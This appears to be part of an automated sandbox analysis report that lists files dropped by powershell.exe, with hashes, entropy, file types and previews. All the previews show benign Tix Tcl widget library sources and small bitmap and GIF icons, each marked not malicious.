                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Control.tcl,v 1.9 2004/03/28 02:44:57 hobbs Exp $..#..# Control.tcl --..#..# .Implements the TixControl Widget. It is called the "SpinBox"..# .in other toolkits...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixControl {.. -classname TixControl.. -superclass tixLabelWidget.. -method {...incr decr invoke update.. }.. -flag {...-allowempty -autorepeat -command -decrcmd -disablecallback...-disabledforeground -incrcmd -initwait -integer -llimit...-repeatrate -max -min -selectmode -step -state -validatecmd...-value -variable -ulimit.. }.. -forcecall {...-variable -state.. }.. -configspec {...{-allowempty allowEmpty AllowEmpty false}...{-autorepeat
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3116
                                                                                                                                                                                                              Entropy (8bit):4.822132598221327
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:RL2Vevk07xgi52WDkxw7SLvSE/Arp9FZV9jg91l4d/xb7SqpvopGzNAsp98Z7p9M:FyqTv
                                                                                                                                                                                                              MD5:8387D929D246DB2B1138B32741539B66
                                                                                                                                                                                                              SHA1:EE000A2A69DC1C24E7646C5DCD15F5DC87BBA8DA
                                                                                                                                                                                                              SHA-256:88C55E1607AA54AF15D8926DF4EB3A53E4DB3145C0DB2CFA179BEE78CDF87755
                                                                                                                                                                                                              SHA-512:AB5FE59AF52F58FACF1F927834F006987B84035FF6E0B5D6EFE557105F197E688771BFAF3522142905E344F71FE56B60D1C60DDA8801AC0591662331D8CD2C47
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DefSchm.tcl,v 1.2 2001/12/09 05:04:02 idiscovery Exp $..#..# DefSchm.tcl --..#..#.Implements the default color and font schemes for Tix...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc tixSetDefaultFontset {} {.. global tixOption tcl_platform.... switch -- $tcl_platform(platform) "windows" {...# This should be Tahoma for Win2000/XP...set font "MS Sans Serif"...set fixedfont "Courier New"...set size 8.. } unix {...set font "helvetica"...set fixedfont "courier"...set size -12.. }.... set tixOption(font) [list $font $size].. set tixOption(bold_font) [list $font $size bold].. set tixOption(menu_font) [list $font $size].. set tixOption(italic_font) [list $font $size bold italic]..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4471
                                                                                                                                                                                                              Entropy (8bit):4.899301562356376
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:F77Mjha4/v6+//PZ5NEpRU9u5h3RRwctP+pnKpUOlmEfCR6:ZIjhJ6YnlEp5zjtP+pKpUOcEM6
                                                                                                                                                                                                              MD5:9BF9CEECBA00416BD70618E52CFF0D04
                                                                                                                                                                                                              SHA1:B567A455FB77790C34F37C6F62B7637F0E182233
                                                                                                                                                                                                              SHA-256:0101A4A368908409E8D2EE3CBF4DAD1691B28AE68354676002962E4BA6DE31FA
                                                                                                                                                                                                              SHA-512:2C6B9C46200D9448B7F6783350188F804AE4042A629DBF90D34DC47084CE1FA2E9997C2C9F6CCE02C2C5567021CB238820C676516D94D65A5616ACE1A9CD1C8E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DialogS.tcl,v 1.5 2004/03/28 02:44:57 hobbs Exp $..#..# DialogS.tcl --..#..#..#.Implements the DialogShell widget. It tells the window..#.manager that it is a dialog window and should be treated specially...#.The exact treatment depends on the treatment of the window..#.manager..#..# Copyright (c) 1994-1996, Expert Interface Technologies..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixDialogShell {.. -superclass tixShell.. -classname TixDialogShell.. -method {...popdown popup center.. }.. -flag {...-mapped -minheight -minwidth -parent -transient.. }.. -static {}.. -configspec {...{-mapped mapped Mapped 0}...{-minwidth minWidth MinWidth 0}...{-minheight minHeight MinHeight 0}...{-transient transient Transient true}...{-parent parent Parent ""}.. }..}....#------
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5632
                                                                                                                                                                                                              Entropy (8bit):5.045347718114719
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:FbOMCAcE8hLR8FPMiujrFgDrfCP8wMi9UOMjmndqupF58+TT:EMsE8hLRyPbCBuD6yVjmd/pFi+TT
                                                                                                                                                                                                              MD5:68A2C22FCAE9CA8B376C80B4EAED6B75
                                                                                                                                                                                                              SHA1:105619675BDB8961FAB455BC98679C96B50280DC
                                                                                                                                                                                                              SHA-256:CE99218B3AC5EAFF04883F0AB4E7F6AEC39C9C7F13B2A9ADA78B8B6B257FA702
                                                                                                                                                                                                              SHA-512:D2C9A8ED0C326A4900E1A64FE7AFC04E5329AE6EBEF09F549B6324301FB47DA038DA7A2DDAC0DD3FA5772CE79FDCD4FA3987CB858E4A3E6FA2E44EB609E9E152
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DirBox.tcl,v 1.4 2004/03/28 02:44:57 hobbs Exp $..#..# DirBox.tcl --..#..#.Implements the tixDirSelectBox widget...#..# . - overrides the -browsecmd and -command options of the..#. HList subwidget..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixDirSelectBox {.. -classname TixDirSelectBox.. -superclass tixPrimitive.. -method {.. }.. -flag {...-command -disablecallback -value.. }.. -configspec {...{-command command Command ""}...{-disablecallback disableCallback DisableCallback 0 tixVerifyBoolean}...{-label label Label "Directory:"}...{-value value Value ""}.. }.. -forcecall {...-value -label.. }.. -default {...{*combo*listbox.heigh
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2301
                                                                                                                                                                                                              Entropy (8bit):5.149652720889196
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:RLbJFuKvk2MXuFPZFxdlpz7Plg3ebgcbLDa6n3rnojxpCFcerf:Fbbu+bjFb/zTSI5ZFceD
                                                                                                                                                                                                              MD5:34805C238172C91272A23A181BE1ECDD
                                                                                                                                                                                                              SHA1:06FE662FECFA41D11F59D939A57A3512F2AA247C
                                                                                                                                                                                                              SHA-256:22185FF1362E6A9BE6F363D096503BBD4DC120BA6C64E562C6C15EC5699754E9
                                                                                                                                                                                                              SHA-512:AC013383CA597B97AA527911ABE8E82FF28C313AA30C5FE546A5FB381ACAC155EE73D8C55BEA5033F9DD63C678F3D91EB4D76D54A945C8ADEAE3876C8A2172C6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DirDlg.tcl,v 1.3 2001/12/09 05:04:02 idiscovery Exp $..#..# DirDlg.tcl --..#..#.Implements the Directory Selection Dialog widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixDirSelectDialog {.. -classname TixDirSelectDialog.. -superclass tixDialogShell.. -method {}.. -flag {...-command.. }.. -configspec {...{-command command Command ""}...{-title title Title "Select A Directory"}.. }.... -default {...{*ok.text.."OK"}...{*ok.underline..0}...{*ok.width..6}...{*cancel.text.."Cancel"}...{*cancel.underline.0}...{*cancel.width..6}...{*dirbox.borderWidth.1}...{*dirbox.relief..raised}.. }..}....proc tixDirSelectDialog:ConstructWidget {w} {.. upvar #0 $w data.... tixChainM
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7336
                                                                                                                                                                                                              Entropy (8bit):4.994789769382544
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:B1G/rGc9KHNdYo20F5SJk/o5d5/ARvBqysJh:B1GD9KtdYp0FAJrLVARvg/
                                                                                                                                                                                                              MD5:6E8AFCAAFF32CBB682546AAE1FFC1453
                                                                                                                                                                                                              SHA1:7C291F5BE9390857A435431E8B4ADF99BDFDE98B
                                                                                                                                                                                                              SHA-256:8447068C3DFFF842005C7D40103B90FA7707D3B1818F6F0CC7385DAFD9F54EC5
                                                                                                                                                                                                              SHA-512:C3ED2CC763216D93F7E4A0C510CAFB5BEC4E47B42A52D43086ECA07D7007FFD6302DA35C050C98BB7478C70C46FC7822F3285E77C4670E5E1FD7311020702E3F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DirList.tcl,v 1.5 2004/03/28 02:44:57 hobbs Exp $..#..# DirList.tcl --..#..#.Implements the tixDirList widget...#..# . - overrides the -browsecmd and -command options of the..#. HList subwidget..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixDirList {.. -classname TixDirList.. -superclass tixScrolledHList.. -method {...chdir.. }.. -flag {... -browsecmd -command -dircmd -disablecallback ... -root -rootname -showhidden -value.. }.. -configspec {...{-browsecmd browseCmd BrowseCmd ""}...{-command command Command ""}...{-dircmd dirCmd DirCmd ""}...{-disablecallback disableCallback DisableCallback 0 tixVerifyBoolean}...{-root root Root ""}...{-root
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9322
                                                                                                                                                                                                              Entropy (8bit):4.9314444400413135
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:4W5KqDhd1lhK5NpMMiuwPukVV5q5/XmB7S:4uKqDhd1zKPpMMiDP3KfmhS
                                                                                                                                                                                                              MD5:7FA4ECE275E44A66B7A68AD32F0C5CE1
                                                                                                                                                                                                              SHA1:430561A54B855EE466972EDF615F0266D3678A4C
                                                                                                                                                                                                              SHA-256:FADEC5D82AB5755F5A9461E5C6EB9D5A2A6CAC4D5AA7BF6E70AC0989CDF9E30F
                                                                                                                                                                                                              SHA-512:53454A87A88ED1C174D4BF659FE9340D21455453D9F824ACC36D11842CA252A5D3056E91AB78C368F572BE457E6D39867CE1A77EBD0853B65F7A5BCFAE033E3F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DirTree.tcl,v 1.4 2004/03/28 02:44:57 hobbs Exp $..#..# DirTree.tcl --..#..#.Implements directory tree for Unix file systems..#..# What the indicators mean:..#..#.(+): There are some subdirectories in this directory which are not..#. currently visible...#.(-): This directory has some subdirectories and they are all visible..#..# none: The dir has no subdirectori(es)...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....##..## The tixDirTree require special FS handling due to it's limited..## separator idea (instead of real tree)...##....tixWidgetClass tixDirTree {.. -classname TixDirTree.. -superclass tixVTree.. -method {...activate chdir refresh.. }.. -flag {..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4191
                                                                                                                                                                                                              Entropy (8bit):4.743369459252691
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:RL/PZDCvkn+4X/fHfHrx8Toja82ldW94N22TG28YZStbE1iMrRJsYlsM6Tef8:F564X/fHfHrx8k+W+2Vo/RQU8
                                                                                                                                                                                                              MD5:FAC63497F7F43F8458CFED9B9FFD9FE2
                                                                                                                                                                                                              SHA1:50F340CD15D6A0F52D50DDFAA3748D24B6809191
                                                                                                                                                                                                              SHA-256:3EB7EAEFE9E626DDF9F13FF022A325BCAAD3433ADCF0528D076A89D3C93B6B3D
                                                                                                                                                                                                              SHA-512:65C23AEEB989FF02DA1B3BD7599A3A28378F7EF83479B3BDCF25B94E2297900750B40BE259FF9483C7E5888B318C3D9BC84BA8E4E6A731870FB2584754F0BED6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DragDrop.tcl,v 1.4 2001/12/09 05:04:02 idiscovery Exp $..#..# DragDrop.tcl ---..#..#.Implements drag+drop for Tix widgets...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixClass tixDragDropContext {.. -superclass {}.. -classname TixDragDropContext.. -method {...cget configure drag drop set startdrag.. }.. -flag {...-command -source.. }.. -configspec {...{-command ""}...{-source ""}.. }..}....proc tixDragDropContext:Constructor {w} {.. upvar #0 $w data..}....#----------------------------------------------------------------------..# Private methods..#..#----------------------------------------------------------------------..proc tixDragDropContext:CallCommand {w target command X Y} {.. upv
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14904
                                                                                                                                                                                                              Entropy (8bit):4.962220617015241
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:FAzrmNf7MzDeSLtbZWjTSo/lUcR/C8z1fLZc:FA8DsmjTTm81lc
                                                                                                                                                                                                              MD5:B34056D79F7B9C9E9CF8B471E4D1E421
                                                                                                                                                                                                              SHA1:719A0315F19EE35D8B0440D4AE655E92AB5DBA1F
                                                                                                                                                                                                              SHA-256:B7C9C936E2CF490272A9B0F821C36CB3BB58F251B428E74C071CEA9B31A1B726
                                                                                                                                                                                                              SHA-512:E9DE41CF5B944D54D149A931019CEBDEC94BC421B90572CD9EAB67049F1578377B300FDA2A8E9117FA60CB14F5BF2125219D7D7D1406017015921B4A7EBF82D6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: FileBox.tcl,v 1.5 2004/03/28 02:44:57 hobbs Exp $..#..# FileBox.tcl --..#..#.Implements the File Selection Box widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......# ToDo..# (1).If user has entered an invalid directory, give an error dialog..#....tixWidgetClass tixFileSelectBox {.. -superclass tixPrimitive.. -classname TixFileSelectBox.. -method {...filter invoke.. }.. -flag {...-browsecmd -command -dir -directory -disablecallback...-grab -pattern -selection -value.. }.. -configspec {...{-browsecmd browseCmd BrowseCmd ""}...{-command command Command ""}...{-directory directory Directory ""}...{-disablecallback disableCallback DisableCallback 0 tixVerifyBoole
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2591
                                                                                                                                                                                                              Entropy (8bit):5.10257693625491
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:RL/Bj79akhkmn1gZ+DfWaekCfTG2wwBpEIsG2e:F/KYwEe5T/wwById2e
                                                                                                                                                                                                              MD5:4D7AA1B8DE59F0B3A4E746144A75FE78
                                                                                                                                                                                                              SHA1:0F6A5FDE0509879BD98536A1066E5E089717F272
                                                                                                                                                                                                              SHA-256:6C00108D75EF779467551DAD23E141A7A670050D3320D4765D1B0B56A8573258
                                                                                                                                                                                                              SHA-512:4027AE56E52614EBB701B6960E11B6B0358B6E27B19BA1ED6E0D7618159EC7725427B44E8851F8A3BE983B2A3F782ACD9F12BF7F3A58F6625614833530A4D8BA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: FileCbx.tcl,v 1.5 2004/03/28 02:44:57 hobbs Exp $..#..# tixFileCombobox --..#..#.A combobox widget for entering file names, directory names, file..#.patterns, etc...#..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# tixFileComboBox displays and accepts the DOS pathnames only. It doesn't..# recognize UNC file names or Tix VPATHS...#..tixWidgetClass tixFileComboBox {.. -classname TixFileComboBox.. -superclass tixPrimitive.. -method {...invoke.. }.. -flag {...-command -defaultfile -directory -text.. }.. -forcecall {...-directory.. }.. -configspec {...{-defaultfile defaultFile DefaultFile ""}...{-directory directory Directory ""}...{-command command Command ""}...{-
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2260
                                                                                                                                                                                                              Entropy (8bit):5.172746366164595
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:RLAylKvkLKkHcDHJgbDZgGkZgdgZgk0+ROk/69yuS6HFuW:FDlD2+VjAjtdk1FuW
                                                                                                                                                                                                              MD5:CBA950AC3F788DDA23FC3885AD812E42
                                                                                                                                                                                                              SHA1:C7A167C94CCDD6F637CBCC7FB9CDEAFA3748FE74
                                                                                                                                                                                                              SHA-256:4BA9F99F0074B1E26A36B1DCEE801850B795B422BC6716467D92A80DBC17A2B5
                                                                                                                                                                                                              SHA-512:07D9242DC1FB42077DD3A0F206C71F7805B1E08719B29E99E8FC1B01D9B4069CA2A7D44599BAB1243EB980481C4E6D22A6741C5BFAAE682276B3942E921FD228
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: FileDlg.tcl,v 1.3 2001/12/09 05:04:02 idiscovery Exp $..#..# FileDlg.tcl --..#..#.Implements the File Selection Dialog widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixFileSelectDialog {.. -classname TixFileSelectDialog.. -superclass tixStdDialogShell.. -method {.. }.. -flag {...-command.. }.. -configspec {...{-command command Command ""}.....{-title title Title "Select A File"}.. }..}....proc tixFileSelectDialog:ConstructTopFrame {w frame} {.. upvar #0 $w data.... tixChainMethod $w ConstructTopFrame $frame.... set data(w:fsbox) [tixFileSelectBox $frame.fsbox \...-command [list tixFileSelectDialog:Invoke $w]].. pack $data(w:fsbox) -expand yes -fill both..}....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (13x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):260
                                                                                                                                                                                                              Entropy (8bit):3.9733885855379034
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeA8j086LEl9zVofH02SL+hSL+hSL+hSL+hSYQSL+hSL+hSL+hSL+hSL+hSYFey:HeDzhbVRRRR4RRRRXy
                                                                                                                                                                                                              MD5:8614D6690999F3133778CBF6CAE276C7
                                                                                                                                                                                                              SHA1:CE153C5E70B878B944C552749AF1DCC75E6DF807
                                                                                                                                                                                                              SHA-256:B9D25190C0042F8F25AB0539424DF8ADEDDB5F12BCB9C8EF7D0039CE63CDB93B
                                                                                                                                                                                                              SHA-512:2BF752D6CB600233DB815F2AF9DCDB0407AC2529426304B11DA379F59B9D7340487D8DA8816A5EB9E5FC1545E9768DE0A858E407A801183CE233738F65D014EB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define ck_off_width 13..#define ck_off_height 13..static unsigned char ck_off_bits[] = {.. 0xff, 0x1f, 0x01, 0x10, 0x01, 0x10, 0x01, 0x10, 0x01, 0x10, 0x01, 0x10,.. 0x01, 0x10, 0x01, 0x10, 0x01, 0x10, 0x01, 0x10, 0x01, 0x10, 0x01, 0x10,.. 0xff, 0x1f};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (13x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                              Entropy (8bit):4.21944628057718
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeA8F08AEl9zVCfH02SL+hSL+hWLGUL2Vd3dDfhdMLEQL+hSYFey:HeD1vbrRR1LotDf8E8Xy
                                                                                                                                                                                                              MD5:59BB11E5F15EA8689712FAE5DDF5BF63
                                                                                                                                                                                                              SHA1:FA3B0791EC66AD612928E3CB713222CEA711B903
                                                                                                                                                                                                              SHA-256:6FDF18B2C0603C9C6DB89134CA7BAEC9BD3BDFD58F6F592C74614CD81053CADC
                                                                                                                                                                                                              SHA-512:F83B61D4E8F3C080CF746A087BAE57A00B49294F4B2EBE1287DE3BAE3ADA1A2E4551B3500663BC924EC2230B798358DD58EE20CC4271675772E2A2BD9C998B18
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define ck_on_width 13..#define ck_on_height 13..static unsigned char ck_on_bits[] = {.. 0xff, 0x1f, 0x01, 0x10, 0x01, 0x10, 0x01, 0x14, 0x01, 0x16, 0x01, 0x17,.. 0x89, 0x13, 0xdd, 0x11, 0xf9, 0x10, 0x71, 0x10, 0x21, 0x10, 0x01, 0x10,.. 0xff, 0x1f};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (14x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):260
                                                                                                                                                                                                              Entropy (8bit):4.045082892886747
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeA8urofDM086pOREnEIRxfHBD/KsLOhWLOhE+LENsqyn:HeDZfDQ6gifD/Km+LENsqyn
                                                                                                                                                                                                              MD5:B9E7D401AE4BD7C8BCE35C54A981266B
                                                                                                                                                                                                              SHA1:9440C512C45EC48FDDFC45C1C8C548D52C69A63E
                                                                                                                                                                                                              SHA-256:B6A9A5A3EF3742BC0F601A0AAE673F00E1A88F0B999FA7D6B620473164DB2AAB
                                                                                                                                                                                                              SHA-512:5E394B3B3DE26CEDB2386BEEBD9DD3E60620A36F5CFD3E30CA1BD2E80B52AAEDCEA0F45524817A255639C19EF7166745C68C0E56B6B6CA756935345BCFDDFE53
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define cross_width 14..#define cross_height 14..static char cross_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x06, 0x18, 0x0e, 0x1c, 0x1c, 0x0e, 0x38, 0x07,.. 0xf0, 0x03, 0xe0, 0x01, 0xe0, 0x01, 0xf0, 0x03, 0x38, 0x07, 0x1c, 0x0e,.. 0x0e, 0x1c, 0x06, 0x18};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (7x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):103
                                                                                                                                                                                                              Entropy (8bit):4.590912542813005
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:HDKA7jq/BRC2DM07jqSMOjRrEnDhfHQvm44eov:HeAqBRfM0ptQn9fHQvm44f
                                                                                                                                                                                                              MD5:BE16989D3293C87881E99D3C8E37161D
                                                                                                                                                                                                              SHA1:0CB0C6DDDD14D07EA60E5E4BA5A25A5BE936FD26
                                                                                                                                                                                                              SHA-256:ED764B336A07336D12DD28F0A75940B2E2D47A23AD8371C377560E91BCAB192C
                                                                                                                                                                                                              SHA-512:12A9349E18EC25B3BF27FE50833B619ED836A6E189B61B44AEDC4B8D58885F93A63A0017AA9D8443E4FF6C1E33E21FC3C076110FA57959F2AF6B741DBACC228F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define decr_width 7..#define decr_height 4..static char decr_bits[] = {.. 0x7f, 0x3e, 0x1c, 0x08};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):334
                                                                                                                                                                                                              Entropy (8bit):4.271640891568391
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeA0orM0erM06KCM0yin9vjxfHuChm7KH8XLKAIhiIhiOhoRDV2hBkf:HeDayrtCRrxm7fXLVIhiIhiOCRDELi
                                                                                                                                                                                                              MD5:4521B55216592B3971821A616CD30F0E
                                                                                                                                                                                                              SHA1:38350108FEF3EA9B4525B11351C9BEA990846AB0
                                                                                                                                                                                                              SHA-256:9A896927B99EFA61981B769BC685E6D411180FE31DC4979FA5D576FC1C7E26DC
                                                                                                                                                                                                              SHA-512:1352EA05F0112BADD45D0D8417465EFD97DF98B7F96475FF6978A9E1EE29D83663A24832A9143058925AE3BF005C29ED112EBFE28860F4648B213B96FD013E36
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define drop_width 16..#define drop_height 16..#define drop_x_hot 6..#define drop_y_hot 4..static unsigned char drop_bits[] = {.. 0x00, 0x00, 0xfe, 0x07, 0x02, 0x04, 0x02, 0x04, 0x42, 0x04, 0xc2, 0x04,.. 0xc2, 0x05, 0xc2, 0x07, 0xc2, 0x07, 0xc2, 0x0f, 0xfe, 0x1f, 0xc0, 0x07,.. 0xc0, 0x06, 0x00, 0x0c, 0x00, 0x1c, 0x00, 0x08};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 12 x 12
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):76
                                                                                                                                                                                                              Entropy (8bit):4.615796921478966
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:CkklR/KwltxlkpWerkTND2YPi:HsR/q7kZi
                                                                                                                                                                                                              MD5:DA15E983B22BF485BFC7249B1E94F0E3
                                                                                                                                                                                                              SHA1:FC544E677A383869F742C15ED1B32BF6FF9F0502
                                                                                                                                                                                                              SHA-256:1AD2FBC604EC60116849574BC4DC371F8CB5796E14571EA2684C8BAB99B4C467
                                                                                                                                                                                                              SHA-512:90AD6B083F0253BFCEC975173BC1BFE31422F6F155AEF45D960ED9C49012142C82EE1EF0CDEB5B6C21D89231931EB19D9D4587B24258683DA1E2AC78BA905208
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF89a...................!.......,...........D..k..X{..@i.Yl.yW(r.G...}....;
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (12x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
